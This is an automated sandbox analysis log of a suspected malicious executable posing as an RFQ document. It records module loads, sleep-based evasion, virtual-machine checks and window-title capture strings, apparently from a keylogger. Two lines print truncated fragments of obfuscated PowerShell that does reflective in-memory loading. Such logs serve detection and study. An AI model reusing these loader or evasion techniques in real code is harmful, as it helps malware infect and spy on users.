Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Centralskolernes $Counterfeiters $Acomia), (Noritic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Padina225 = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Enduringness)), $Printeres).DefineDynamicModule($strossers, $false).DefineType($Bylandmandens, $Umbellulidae, [System.MulticastDelegat

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\INTECH RFQ EN241813.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5996			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3651			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6764	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5796	Thread sleep time: -40000s >= -30000s			Jump to behavior

Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWindows\system32\en-US\mswsock.dll.muipv
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerg
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFD\
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerneer
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFD\r
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrkd
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager)
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerneer`
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerneer!
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E9F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageripc
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: msiexec.exe, 00000007.00000002.3361750850.0000000008E5A000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.dr	Binary or memory string: [Program Manager]

